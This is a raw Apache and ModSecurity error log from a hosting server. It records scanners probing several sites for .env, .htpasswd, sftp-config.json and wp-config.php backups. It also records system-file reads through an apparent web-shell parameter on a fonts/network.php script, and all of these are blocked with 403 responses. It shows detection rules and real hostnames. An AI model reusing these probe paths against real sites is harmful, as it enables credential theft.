[Mon May 11 11:56:30.794435 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:6412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnzURdw2n9wv6Ai48JTgAAAJg"]
[Mon May 11 11:56:30.821012 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:6428] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /admin/sftp-config.json.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/admin/sftp-config.json.inactive"] [unique_id "agGnzkYQeUtAPynIs6xZZwAAABI"]
[Mon May 11 11:56:30.821233 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:6428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/admin/sftp-config.json.inactive"] [unique_id "agGnzkYQeUtAPynIs6xZZwAAABI"]
[Mon May 11 11:56:32.765689 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:6428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnzkYQeUtAPynIs6xZZwAAABI"]
[Mon May 11 11:56:35.897388 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:61960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /akka/.env.local-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/akka/.env.local-update"] [unique_id "agGn02S6k_SCYd1AVZqvWAAAARU"]
[Mon May 11 11:56:35.897699 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:61960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/akka/.env.local-update"] [unique_id "agGn02S6k_SCYd1AVZqvWAAAARU"]
[Mon May 11 11:56:37.255823 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:61960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGn02S6k_SCYd1AVZqvWAAAARU"]
[Mon May 11 11:56:37.549061 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:61974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /akka/.env.local-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/akka/.env.local-update"] [unique_id "agGn1URdw2n9wv6Ai48JVwAAAIA"]
[Mon May 11 11:56:37.549693 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:61974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/akka/.env.local-update"] [unique_id "agGn1URdw2n9wv6Ai48JVwAAAIA"]
[Mon May 11 11:56:38.762039 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:61974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGn1URdw2n9wv6Ai48JVwAAAIA"]
[Mon May 11 11:56:41.850333 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:62000] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /akka/.htpasswd.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/akka/.htpasswd.dev"] [unique_id "agGn2ZkIEwRJMyDaV55PhQAAAUI"]
[Mon May 11 11:56:41.851587 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:62000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/akka/.htpasswd.dev"] [unique_id "agGn2ZkIEwRJMyDaV55PhQAAAUI"]
[Mon May 11 11:56:43.342197 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:62000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGn2ZkIEwRJMyDaV55PhQAAAUI"]
[Mon May 11 11:56:43.362400 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:22188] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /akka/.htpasswd.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/akka/.htpasswd.dev"] [unique_id "agGn2xjZymfuKpjWXeh-YgAAANQ"]
[Mon May 11 11:56:43.362706 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:22188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/akka/.htpasswd.dev"] [unique_id "agGn2xjZymfuKpjWXeh-YgAAANQ"]
[Mon May 11 11:56:44.609449 2026] [security2:error] [pid 1254133:tid 1254156] [client 185.177.72.9:22188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGn2xjZymfuKpjWXeh-YgAAANQ"]
[Mon May 11 11:57:00.578474 2026] [security2:error] [pid 1256241:tid 1256270] [client 216.73.216.110:9850] ModSecurity: Warning. Matched phrase "proc/self/mounts" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/mounts found within ARGS:filesrc: /proc/self/mountstats"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGn7JkIEwRJMyDaV55PoQAAAVg"]
[Mon May 11 11:57:00.579599 2026] [security2:error] [pid 1256241:tid 1256270] [client 216.73.216.110:9850] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGn7JkIEwRJMyDaV55PoQAAAVg"]
[Mon May 11 11:57:00.668393 2026] [security2:error] [pid 1256241:tid 1256270] [client 216.73.216.110:9850] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGn7JkIEwRJMyDaV55PoQAAAVg"]
[Mon May 11 11:57:07.520313 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:07.678582 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:07.836329 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:07.993880 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:08.170170 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:08.327865 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:08.485459 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:08.643078 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:08.800671 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:08.987365 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:09.145961 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:09.303510 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:09.665515 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:10.193502 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:17208] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /angular/wp-config.php2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/angular/wp-config.php2023"] [unique_id "agGn9mS6k_SCYd1AVZqvjAAAAQI"]
[Mon May 11 11:57:10.193806 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:17208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/angular/wp-config.php2023"] [unique_id "agGn9mS6k_SCYd1AVZqvjAAAAQI"]
[Mon May 11 11:57:10.345689 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:10.503334 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:10.660855 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:10.818560 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:10.975936 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:11.133484 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:11.291917 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:11.465410 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:11.622852 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:11.780505 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:11.938041 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:12.095559 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:12.253123 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:12.389689 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:17208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGn9mS6k_SCYd1AVZqvjAAAAQI"]
[Mon May 11 11:57:12.407152 2026] [:error] [pid 1254179:tid 1254198] [client 51.75.23.111:35248] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:12.410447 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:12.420169 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:17224] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /angular/wp-config.php2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/angular/wp-config.php2023"] [unique_id "agGn-L4KNmD_mZ_vlf859wAAAEY"]
[Mon May 11 11:57:12.421397 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:17224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/angular/wp-config.php2023"] [unique_id "agGn-L4KNmD_mZ_vlf859wAAAEY"]
[Mon May 11 11:57:12.428660 2026] [:error] [pid 1254328:tid 1254347] [client 51.77.211.39:60644] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:12.568038 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:12.615595 2026] [:error] [pid 1256241:tid 1256261] [client 57.129.81.154:58246] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:12.725655 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:12.865860 2026] [:error] [pid 1254133:tid 1254160] [client 51.77.211.39:60660] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:12.925439 2026] [:error] [pid 1254328:tid 1254337] [client 51.38.115.13:40720] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:12.999883 2026] [:error] [pid 1254242:tid 1254269] [client 57.129.81.225:56484] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:13.106344 2026] [:error] [pid 1254212:tid 1254235] [client 51.38.112.81:41372] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:13.154123 2026] [:error] [pid 1256241:tid 1256257] [client 151.80.133.171:44086] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:13.460029 2026] [:error] [pid 1254242:tid 1254252] [client 145.239.81.31:37810] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:13.679705 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:17224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGn-L4KNmD_mZ_vlf859wAAAEY"]
[Mon May 11 11:57:14.418313 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:14.586651 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:15.089388 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:15.404651 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:15.562209 2026] [proxy_fcgi:error] [pid 1254179:tid 1254184] [client 4.193.137.131:14225] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:16.620473 2026] [proxy_fcgi:error] [pid 1254133:tid 1254145] [client 4.193.137.131:14255] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:16.802303 2026] [proxy_fcgi:error] [pid 1254133:tid 1254145] [client 4.193.137.131:14255] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:17.182347 2026] [proxy_fcgi:error] [pid 1254133:tid 1254145] [client 4.193.137.131:14255] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:17.897781 2026] [proxy_fcgi:error] [pid 1254133:tid 1254145] [client 4.193.137.131:14255] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:18.055667 2026] [proxy_fcgi:error] [pid 1254133:tid 1254145] [client 4.193.137.131:14255] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:18.999808 2026] [proxy_fcgi:error] [pid 1254133:tid 1254145] [client 4.193.137.131:14255] AH01071: Got error 'Primary script unknown'
[Mon May 11 11:57:20.526305 2026] [:error] [pid 1254179:tid 1254187] [client 151.80.133.55:55468] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:57:22.705680 2026] [authz_core:error] [pid 1254212:tid 1254214] [client 17.241.75.97:54424] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/error_log
[Mon May 11 11:57:31.616336 2026] [security2:error] [pid 1254242:tid 1254246] [client 216.73.216.110:20743] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: /base64 found within ARGS:filesrc: //bin/base64"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoC74KNmD_mZ_vlf86JAAAAEA"]
[Mon May 11 11:57:31.617393 2026] [security2:error] [pid 1254242:tid 1254246] [client 216.73.216.110:20743] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoC74KNmD_mZ_vlf86JAAAAEA"]
[Mon May 11 11:57:31.674932 2026] [security2:error] [pid 1254242:tid 1254246] [client 216.73.216.110:20743] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoC74KNmD_mZ_vlf86JAAAAEA"]
